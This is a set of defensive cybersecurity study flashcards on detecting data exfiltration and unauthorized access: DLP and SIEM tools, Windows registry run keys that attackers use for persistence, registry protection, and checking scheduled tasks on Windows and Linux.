(3) Not allowed access, privileges and changes and data theft Flashcards
In terms of most threats to systems, what is one of the key indicators of bad activity on a system or network?
In terms of most threats to systems, one of the key indicators of bad activity on a system or network is Data exfiltration, which is the unallowed removal of data from datastores or computers
Describe the tug of war between security practitioners and bad actors in the battle over data
In the battle over data, security practitioners need to use tools and techniques to find and stop the data from being stolen and bad actors normally try to hide data theft activities through:
encryption, commonly used channels like HTTPS, or using covert channels like tunneling DNS requests and other services
What types of tools should be involved in the battle to keep data from being stolen?
Data Loss Prevention (DLP), EDR and IPS play a role in preventing data from being stolen.
In addition, data tagging and other protection measures are useful too
What types of analysis tools can be used to detect, prevent, and mitigate unauthorized access, changes, and privilege use?
Tools such as Central management suite, SIM/SIEM, File Integrity checking tools, and log analysis tools are useful to detect unauthorized access, changes or privilege use
Unauthorized privileges can be tough to track, especially if central management isn’t in place, but what can be used to help avoid this?
Sysinternals AccessChk can validate that users and groups have proper access to files, registry keys, etc.
Within Linux, as an aside, a script may be needed to accomplish this
What is a key target that attackers like to exploit to get and maintain access to a Windows system?
The Windows registry is a key location for attackers to get and maintain access to a Windows system, they especially like “run” keys
What are the important “run” keys that attackers like to take advantage of?
The important “run” keys that attackers like to take advantage of include:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
When it comes to protecting the Registry in Windows, what should be done to protect systems that have infrequent changes (such as servers)?
For systems that have infrequent changes like servers, protecting the registry is relatively easy through app allow lists
When it comes to protecting the Registry in Windows, what should be done to protect systems when registry monitoring tools cannot be implemented?
When registry monitoring tools cannot be implemented, a lockdown tool can be used to stop all registry changes
When it comes to protecting the Registry in Windows, what should be done to protect systems when registry changes are allowed?
When registry changes are allowed, registry monitoring tools should be shut off or set to a mode that allows changes when patching Windows and then they should be turned back on for daily operations
When it comes to protecting the Registry in Windows, what should be done to protect systems when changes can be made more frequently?
When changes may be made more frequently, in depth control choices should be put in place such as an agent based tool to prevent false positives
What do we need to be aware of when it comes to scheduled tasks?
When it comes to scheduled tasks, attackers love to use those to get persistent access to systems. Checking for scheduled tasks is a normal part of incident response
How can one check for scheduled tasks in Windows 10?
In Windows 10, one can check for scheduled tasks by going to Start, Windows Administrative Tools, Task Scheduler
How can one check for scheduled tasks in Windows 11?
In Windows 11, one can check for scheduled tasks by going to Start, Windows Tools, Task Scheduler
How does one check for scheduled tasks in Linux?
In Linux, one can check for scheduled tasks by checking chron
